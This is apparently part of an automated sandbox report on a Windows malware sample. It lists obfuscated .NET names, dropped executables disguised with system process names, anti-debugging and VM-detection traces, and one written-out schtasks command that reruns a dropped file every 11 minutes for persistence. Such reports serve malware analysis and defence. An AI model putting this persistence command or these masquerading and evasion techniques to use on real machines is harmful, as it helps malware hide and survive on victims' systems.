            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, Evl3cAqOFiVg9mM2ClZ.csHigh entropy of concatenated method names: 'GQVG9v9xht', 'kbiGgkNI3N', 'lcxGwPeWYO', 'XjSGbVZxTB', 'pmeGRD4yCD', 'kqUGca3wkP', 'Py5GmgClAO', 'PbSGnmItgS', 'LGUGGtN3Ko', 'oWwGKVcImB'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, By73cFaHvpBc4HC8PrC.csHigh entropy of concatenated method names: 'AdwQzmgoxk', 'pTJt7nmgNn', 'yhlt83eyvN', 'NNdtkZ9vcc', 'RdGtQkK3uj', 'pP8ttFf6M1', 'QxdtJGYbfK', 'RkftYHMnRt', 'wNRt5m1pJC', 'x8YtX4MraO'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, FxJ6QNmnwPMo7OvtXq2.csHigh entropy of concatenated method names: 'xR08LtZTiQ', 'zqU17N1bvfaRrf3t8DB', 'iu9AjI1JABCv12Qk0l1', 'w9vEn81u6sCbYmSu49u', 'iMZjko1vkTMU6V1s1Ns', 'OL0kh81ssuEWMfQmStL', 'QEPvXa1RyFaGkqtG32m', 'w2HTdi1YJQLOEyYftuA', 'NMU8vTNd52', 'mWEPaF1K02GRiZLoY5r'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, mhpvIirR2cvRa7E9Pf.csHigh entropy of concatenated method names: '_23T', 'YZ8', 'ELp', 'G9C', 'obsUSkJowlvh4XU1pHw', 'zRj446JTjN9yD73Txub', 'km4rCKJidnVYWtN6pwF', 'JfRTJsJA7MjUorNOm02', 'durCPBJzUOrYUSbeDVM', 'dEWcJQsuHwIREdCyL4q'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, bHbkAe0FcDZuHP4qInt.csHigh entropy of concatenated method names: 'o4TkuCXLmIYZTPHbyIr', 'kfrRGCXniwA6PePojAR', 'iecVwMXWmO7ELxcSZEB', 'nsdhk4XHPesLrqTXHkx', 'dtnu9YlZiF', 'PRwgvgXOqYAZEfc1CCG', 'mdcTRZXNJPJoRi9x7jk', 'gxJOpeXy6PX6LPSmS3n', 'rRTNgTX9Ljl4LtOkxfs', 'nFbL5SXDs62jAkSGhwe'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, HA0jxummkOGQ0ZZKu2b.csHigh entropy of concatenated method names: 'tO4', 'YZ8', '_4kf', 'G9C', 'Ae3p3FYhiLQGVp22Fgw', 'SKPx4LYfPH5c6OCKbdk', 'I7uaC2YWJPNky3dcwVX', 'LTseR4YHUbSsecOrFxR', 'MUbrXXYL0XdFIeWwpjc', 'bG6jj2Ynb2i79YUmFgP'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, fMKenYarA42w2WuhMuA.csHigh entropy of concatenated method names: 'zPCYXYSHHY', 'Ab8YpIYWTS', 'OwoRNDS8lMLKQeZqrOZ', 'ubvPslSoWmV7xclu7TU', 'bBcu7vSdsFxG3b5wyxn', 'lV9cLFSMCeTrFC5aQRh', 'EZCYH81jIU', 'grkXwJ4u0f5ixGK0qYH', 'KwA6iv4vHZ2Qk4IRd5B', 'RDjnWISABPKdvHIjY3C'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, r2Bw81mU2g4lQVpaIFT.csHigh entropy of concatenated method names: 'YMek8pRdMc', 'TYFkkbTRX4', 'Kd1kQvsJMO', 'pnyLgq1FlT8C4CVBlGl', 'sXxLiS1d7XbfEIAvulp', 'QNPihS1pDYaWHmUOZYu', 'GLnYrB12wQB8w5odnUW', 'DsDZNI1MitgPu9QJ1Fs', 'm3iDGS18xrbVHITQtdX', 'r0HINF1oel56XOOU8OL'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, mXBbRbmEy2xiM1UUACi.csHigh entropy of concatenated method names: 'HK18x4Aug9', 'LkCHAy1jCkBo1SM6URv', 'X7GTxy1kPeMLToCMqn9', 'YdXXic1GIQEmR4SB9d0', 'faLLPF1lnMNexAqJWjB', 'NPXCDo13MS0vKYy47Y0', '_3Xh', 'YZ8', '_123', 'G9C'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, kVEuDGF1SyuD1e5MA0W.csHigh entropy of concatenated method names: 'tJdPCeyjuJ8F8CNo8QK', 'JaQgesyknf38uVAKQtU', 'KxJU43yGlg9QS6L15YU', 'aHOaHrylqySEE3vrMph', 'IWF', 'j72', 'VXd0HfJ5Mp', 'ckx0y53KAf', 'j4z', 'aTM0iCCRRP'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, gbJdVhaaIagNGuoITLx.csHigh entropy of concatenated method names: 'DCNkvRjH7K', 'rLTk4FXFGK', 'oY7kBYKshr', 'j3qkPGLM5A', 'eQTkfWg9V1', 'yOckN74fmb', 'u3bn9exS5O5vT4Q90v1', 'WGwCr3x4PH90AowC4HE', 'pAdFuhxe04Iy2fa6LDI', 'nReobgxaj8fcTYssXu0'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, xK0lWAaLgeioh5oXL5h.csHigh entropy of concatenated method names: 'eo7tDORPOl', 'tvOtFjwpf4', 'XYctq3V78X', 'oyQtou9r1h', 'QdMt9rVg8g', 'EBRCW7euqboCdC0QVNc', 'ws6MVnevyEfAFfTk2YS', 'isVkie7AvWMWJuw1RrZ', 'uu2QXv7zAuUtDpZv3pi', 'RVrjrFebiyJFT2G06wW'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, y4LFEImfIk4p8nqxTfb.csHigh entropy of concatenated method names: 'GvP', 'YZ8', 'bp6', 'G9C', 'zr4BnvKlJVnL8Tu74b4', 'f0sfqLKjjMw0mgmcpPK', 'RibU0wKkd63LChr3Q8M', 'MdwcyIK3VflswbwVE8K', 'TjpX30KwPExKhjSEeQv', 'QXhwyWKZ9xSZLoU6YJu'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, aJhSi2qJ0h96BUl08RX.csHigh entropy of concatenated method names: 'ydpiftYYu1d9H', 'dL5Jio57KDDpYRZ5wFw', 'JeNAj05eILTTcUCKFin', 'mpP36o5a3Z0grOAR7Cx', 'NW8LEh5SnXXMyAgqrg6', 'wRt8Di54IynSv5YoLRx', 'EakKwr5BvOi1AtPTi7G', 'YvHARX50HLQqvc3TMPl', 'uMEmQg5hnx8SFjMqaRK', 'JZ929N5f4SWhxF8mfCs'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, XsxJv73VDyfZNs3OMp.csHigh entropy of concatenated method names: '_468', 'YZ8', '_2M1', 'G9C', 'DVLSZdsS1kIKSG2eU1a', 'a8TUAys4jAha0BYCtf3', 'HeyJnXshqYG51GbP8sB', 'CcYseFsf6DHBYL6rGeK', 'fTrPYVsWxDBbU7461ZT', 'ujD3lWsH7Zm6VDj03iN'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, TFHhWBq307YNEM9XoC.csHigh entropy of concatenated method names: 'tTFExbRe7', 'tArVccXt6EQ8nQDvgv', 'UY7XIvqTHZ03vXFsDA', 'spsf2pVQpEaV8HtCRl', 'IfCAN1PAm3KX61UvKW', 'MgEEM5GHPXo8FMj78F', 'ehskk0TtI', 'ox4QLEl2L', 'XqwtPs6YI', 'XLiJb0BmR'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, zNfggi0TKHU3h0ejY5x.csHigh entropy of concatenated method names: 'UpJgRY2fn3', 'k9Rgc4xSqG', 'F8e', 'bLw', 'U96', '_71a', 'O52', 'dwZgmES5MB', '_5f9', 'A6Y'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, T2euL90nlQnc8g1Gqx9.csHigh entropy of concatenated method names: 'AAY9vEjMJn', 'jUx94pP1Pw', 'Rbd9BAn8rs', 'GrOqT3jwIF8O97hAuvp', 'XRjb9wjkAQfHYoU6eev', 'juRb00j3Cr80njJOX2p', 'X5dPQ9jZWPZhyPgo1po', 'v0o6kmj6HgACeUoMSBx', 'wkbLJxjQVM0MbIDET0d', 'QN0NuNjUKre02b6Jy3Z'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, wCfM5yMftbsogsD0YtK.csHigh entropy of concatenated method names: 'iw4bpukoNh', 'YJeb07NwRH', 'Kddb2vNavk', '_3Gf', '_4XH', '_3mv', '_684', '_555', 'Z9E', 'kITbsuRCTV'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, asZ9DE1ccM4YKcHyXO.csHigh entropy of concatenated method names: '_88Z', 'YZ8', 'ffV', 'G9C', 'c3cldtRUXMGicFKRvO8', 'wQhSXeR5vGpKZip3yMb', 'JuiRkJRITNBjPakYqK9', 'MAuxdTRm1d62XNDe5ou', 'lySetERpNhS2xdsxqx5', 'eHwWbZR2BtBKIoP7qQl'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, rsFBbmgJ33m0WqROnwb.csHigh entropy of concatenated method names: '_4J6', '_5Di', '_1y5', '_77a', '_1X1', '_7fn', 'OUK', '_8S4', 'wUn', '_447'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, diE1NG0herVKOKEhH0O.csHigh entropy of concatenated method names: 'KG8g7pMNWU', 'iQOVfjjTw6h9KvgLBAy', 'kemDwmj8yWfhVaCpbp6', 'upYOdLjoS1t2qcnI6c0', 'boUlCZjijxjE28IKkUe', 'iLobq6jAuQp8Nwq6efi', 'JxDjqNjzra4lUmrnBga'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, kScwTgWlQTYNUx2whp.csHigh entropy of concatenated method names: '_8Ok', 'YZ8', 'InF', 'G9C', 'pP8DltR7OmaTNN7jhig', 'pygQKGReRaPororfoZL', 'Hglp1IRaY2EIceH3Wyp', 'EOCgVHRSrKoTVm9roem', 'uJGd8cR4E00xyWp30SA', 'oHMUMJRhiSOU9dnvihP'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, TQUNjMMMkxXor8NymWG.csHigh entropy of concatenated method names: 'Qkp', '_72e', 'R26', '_7w6', 'Awi', 'n73', 'cek', 'ro1', '_9j4', '_453'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, hNYBPtg1B7Yhs0fKEYA.csHigh entropy of concatenated method names: 'LVsTgIXgLi', 'pveTbTQU8E', 'g0BTE8HTha', 'rlbTCSdLmK', 'jNDTTeDWtP', 'HivThoNATk', 'FFJTHQpfQl', 'oLDTyoNj7N', 'Yh2TiOtXS5', 'xFATZTKm0t'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, zJuQfFF3KgI6yXhl2fK.csHigh entropy of concatenated method names: '_5u9', 'GVRXTBj4W2', 'UeF07PnND7', 'v8yXYZhaTg', 'VSI9YILTvJTGdT7w95a', 'So43pyLii1roQ9gapOh', 'qT101RLA0rCs91m5oUc', 'be7sDmL8bspXhU8jtpb', 'dRAELKLoSHHUwtPwdTO', 'nlgyFvLzeLKFRu86kGo'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, ip8Bkt0X3UG3hb3ABuB.csHigh entropy of concatenated method names: 'rvGb7dkRFupEVniLbeY', 'EXXHJXkYOU0aooiCsuE', 'jXSdBjkJV5MQ0hEcydx', 'rbX6YBks3xZIZA1Z40Y', 'g4Eo7Mkr3emtn7RKf1Y', 'T8EVDUktx0Pi6fHrg3c', 'nVGkghkKfDPlLaTkgLw'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, cdTMiOgks9X2hco0roI.csHigh entropy of concatenated method names: '_45b', 'ne2', '_115', '_3vY', 'TnGE78WY49', '_3il', 'CQmE8lwkI3', 'oueEkFfe7u', '_78N', 'z3K'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, xOFT2jm1PkFksqZNEPX.csHigh entropy of concatenated method names: 'D3xkZcrcTu', 'vRMZWycYFarMffslkh6', 'DpXRmUcreUnjSTf319n', 'Mf56VZcsDn7KSibAvGx', 'sxkCJqcRNUYr4J1Hn8U', 'zTikB1ctnVQghZ0RDUT', '_5q7', 'YZ8', '_6kf', 'G9C'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, a7HAluMdPPpmLOxBBjr.csHigh entropy of concatenated method names: 'msNcSNt7bp', 'gXqsCbQCU2INdrThoZG', 'jkUfDbQqCsZuIWf4HdB', 'XOPaO9QDjfLUZdFVtDx', 'wiilRiQgpojZBqodxmn', '_1fi', 'cUuRPBUMn7', '_676', 'IG9', 'mdP'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, Jt8CxxmJ64G8yUjnbUT.csHigh entropy of concatenated method names: '_6U6', 'YZ8', '_694', 'G9C', 'Bx0Q0prhtoVDraC8RUn', 'CafRvxrf70NemiEC8FX', 'qVYjMxrWmtubic5QZVg', 'PTwKQqrHib1xs42KpYE', 'dLMQUYrLfeNRTePQwPB', 'mEp1exrneS3DNEhQFkO'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, MrZfWrF6t0EjslxUXd9.csHigh entropy of concatenated method names: '_223', 'RrPaJSWSrjuUBG5SXL0', 'y8LkdGW4EsMw9gO6D63', 'bLnGihWhbRBTcB7oP5N', 'WvVqIfWfv8J0g8uWXwD', 'ftMpwNWWX0XfGkeDasu', 'S8IFGDWHp8g0WIUUCJa', 'xVK3VxWLVpiufxZEoUj', 'lxPQBJWnOioBZLTMJpJ', 'B9p7dAWyZTkF1tCSSZQ'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, rwQr8sMOa8k6IjC5GbC.csHigh entropy of concatenated method names: '_7tu', '_8ge', 'DyU', '_58f', '_254', '_6Q3', '_7f4', 'B3I', '_75k', 'd4G'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, gwsBrqgAcTyaRGRXvHY.csHigh entropy of concatenated method names: 'wthEO6CAaJ', 'Il5EM0N1sS', 'uc5EWlunPj', 'UY9EjKwMFs', 'xbQESq4cRs', 'YSb6hwNhNimaXnaipED', 'g7IkasNSSekwuRxcrNk', 'rBnYODN4veUVddgvCvO', 'VxDSfHNfotOQY36d9Q4', 'y7lhNQNWVdyaUlxEHOW'

            Persistence and Installation Behavior

            Source: C:\ReviewHost\brokercrt.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exe File created: C:\Windows\Containers\serviced\wininit.exe
            Source: C:\ReviewHost\brokercrt.exe File created: C:\Recovery\smss.exe
            Source: C:\ReviewHost\brokercrt.exe File created: C:\Program Files (x86)\Google\Update\AFKwztugVSPq.exe
            Source: C:\ReviewHost\brokercrt.exe File created: C:\ReviewHost\conhost.exe
            Source: C:\ReviewHost\brokercrt.exe File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exe
            Source: C:\ReviewHost\brokercrt.exe File created: C:\Users\Public\AFKwztugVSPq.exe
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exe File created: C:\ReviewHost\brokercrt.exe
            Source: C:\ReviewHost\brokercrt.exe File created: C:\Users\user\AFKwztugVSPq.exe
            Source: C:\ReviewHost\brokercrt.exe File created: C:\ReviewHost\RuntimeBroker.exe
            Source: C:\ReviewHost\brokercrt.exe File created: C:\Users\Public\Videos\AFKwztugVSPq.exe
            Source: C:\ReviewHost\brokercrt.exe File created: C:\Users\Default\WinStore.App.exe
            Source: C:\ReviewHost\brokercrt.exe File created: C:\ReviewHost\AFKwztugVSPq.exe
            Source: C:\ReviewHost\brokercrt.exe File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\cscript.exe

            Boot Survival

            Source: C:\ReviewHost\brokercrt.exe File created: C:\Users\Public\AFKwztugVSPq.exe
            Source: C:\ReviewHost\brokercrt.exe File created: C:\Users\user\AFKwztugVSPq.exe
            Source: C:\ReviewHost\brokercrt.exe File created: C:\Users\Default\WinStore.App.exe
            Source: C:\ReviewHost\brokercrt.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 11 /tr "'C:\Users\user\AFKwztugVSPq.exe'" /f
            Source: C:\ReviewHost\brokercrt.exe File created: C:\Users\Default User\Start Menu\Programs\System Tools\cscript.exe
            Source: C:\ReviewHost\brokercrt.exe File created: C:\Users\Default User\Start Menu\Programs\System Tools\4e3ac3462c9605
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\ReviewHost\brokercrt.exe Memory allocated: 11E0000 memory reserve | memory write watch
            Source: C:\ReviewHost\brokercrt.exe Memory allocated: 1AF90000 memory reserve | memory write watch
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exe Memory allocated: 9C0000 memory reserve | memory write watch
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exe Memory allocated: 1A4E0000 memory reserve | memory write watch
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exe Memory allocated: DE0000 memory reserve | memory write watch
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exe Memory allocated: 1AB00000 memory reserve | memory write watch
            Source: C:\ReviewHost\brokercrt.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
            Source: C:\ReviewHost\brokercrt.exe Window / User API: threadDelayed 1745
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exe Window / User API: threadDelayed 367
            Source: C:\ReviewHost\brokercrt.exe TID: 6616 Thread sleep count: 1745 > 30
            Source: C:\ReviewHost\brokercrt.exe TID: 6584 Thread sleep count: 348 > 30
            Source: C:\ReviewHost\brokercrt.exe TID: 3224 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exe TID: 7064 Thread sleep count: 329 > 30
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exe TID: 7064 Thread sleep count: 55 > 30
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exe TID: 2104 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exe TID: 3176 Thread sleep count: 367 > 30
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exe TID: 3620 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: C:\ReviewHost\brokercrt.exe File Volume queried: C:\ FullSizeInformation
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exe File Volume queried: C:\ FullSizeInformation
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exe File Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exe Code function: 0_2_00F3A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00F3A5F4
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exe Code function: 0_2_00F4B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00F4B8E0
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exe Code function: 0_2_00F5AAA8 FindFirstFileExA,0_2_00F5AAA8
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exe Code function: 0_2_00F4DD72 VirtualQuery,GetSystemInfo,0_2_00F4DD72
            Source: C:\ReviewHost\brokercrt.exe File opened: C:\Users\user\Documents\desktop.ini
            Source: C:\ReviewHost\brokercrt.exe File opened: C:\Users\user
            Source: C:\ReviewHost\brokercrt.exe File opened: C:\Users\user\AppData\Local\Temp
            Source: C:\ReviewHost\brokercrt.exe File opened: C:\Users\user\AppData
            Source: C:\ReviewHost\brokercrt.exe File opened: C:\Users\user\AppData\Local
            Source: C:\ReviewHost\brokercrt.exe File opened: C:\Users\user\Desktop\desktop.ini
            Source: wscript.exe, 00000002.00000003.2075195482.000000000294D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}j^P
            Source: wscript.exe, 00000002.00000003.2075195482.000000000294D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\^d
            Source: hx1hwVZIjy.exe, 00000000.00000003.1990820074.0000000003352000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\j$=
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exe API call chain: ExitProcess graph end node graph_0-24385
            Source: C:\ReviewHost\brokercrt.exe Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exe Code function: 0_2_00F5866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00F5866F
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exe Code function: 0_2_00F5753D mov eax, dword ptr fs:[00000030h] 0_2_00F5753D
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exe Code function: 0_2_00F5B710 GetProcessHeap,0_2_00F5B710
            Source: C:\ReviewHost\brokercrt.exe Process token adjusted: Debug
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exe Process token adjusted: Debug
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exe Process token adjusted: Debug
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exe Code function: 0_2_00F4F063 SetUnhandledExceptionFilter,0_2_00F4F063
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exe Code function: 0_2_00F4F22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00F4F22B
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exe Code function: 0_2_00F4EF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00F4EF05
            Source: C:\ReviewHost\brokercrt.exe Memory allocated: page read and write | page guard
